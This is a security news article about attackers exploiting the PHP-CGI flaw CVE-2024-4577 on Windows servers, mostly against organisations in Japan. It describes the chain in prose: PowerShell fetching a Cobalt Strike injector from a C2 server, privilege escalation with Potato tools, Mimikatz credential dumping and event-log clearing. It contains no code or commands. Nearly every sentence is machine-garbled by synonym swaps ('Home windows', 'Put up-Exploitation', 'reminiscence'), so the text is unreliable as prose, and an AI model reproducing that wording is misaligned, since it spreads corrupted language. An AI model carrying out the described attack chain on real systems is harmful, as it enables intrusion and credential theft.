A latest cybersecurity menace has emerged the place unknown attackers are exploiting a vital distant code execution (RCE) vulnerability in PHP-CGI on Home windows programs.
This vulnerability, recognized as CVE-2024-4577, permits attackers to execute arbitrary PHP code on servers utilizing Apache with a susceptible PHP-CGI setup.
The attackers are primarily concentrating on organizations in Japan throughout varied sectors, together with know-how, telecommunications, leisure, training, and e-commerce.
Exploitation and Put up-Exploitation Actions
The attackers acquire preliminary entry by leveraging a publicly out there Python exploit script that checks for the CVE-2024-4577 vulnerability.
As soon as exploited, they execute a PowerShell command embedded in PHP code, which downloads and runs a PowerShell injector script from a command and management (C2) server.
Based on Cisco Talos Report, This script injects and executes Cobalt Strike reverse HTTP shellcode, enabling distant entry to the sufferer machine.
The attackers then use plugins from the Cobalt Strike “TaoWu” equipment for post-exploitation actions, together with reconnaissance, privilege escalation, and persistence.
They make use of instruments like JuicyPotato, RottenPotato, and SweetPotato for privilege escalation, and modify registry keys and create scheduled duties to keep up persistence.
The attackers additionally interact in community reconnaissance utilizing instruments like “fscan.exe” and “Seatbelt.exe” to map potential targets for lateral motion.
They try and abuse Group Coverage Objects (GPOs) to execute malicious scripts throughout the community.
Moreover, they use Mimikatz to dump and exfiltrate passwords and NTLM hashes from reminiscence.
To evade detection, they clear Home windows occasion logs utilizing “wevtutil.exe.”
Misuse of Authentic Instruments and Frameworks
The attackers have been noticed misusing reliable instruments and frameworks hosted on an Alibaba cloud container registry.
They use a pre-configured installer script to deploy a set of adversarial instruments, together with Vulfocus, Asset Reconnaissance Lighthouse (ARL), Viper C2, Starkiller, BeEF, and Blue-Lotus.
These instruments are usually used for offensive safety testing however are being repurposed for malicious actions.
The attackers’ ways present similarities with these utilized by identified hacker teams, although attribution stays unsure.
The continuing exploitation of public-facing functions for preliminary entry highlights the significance of patching vulnerabilities and implementing strong safety measures.
Organizations ought to prioritize securing their PHP-CGI implementations and monitoring for suspicious exercise to mitigate these threats.
Gather Risk Intelligence on the Newest Malware and Phishing Assaults with ANY.RUN TI Lookup -> Strive free of charge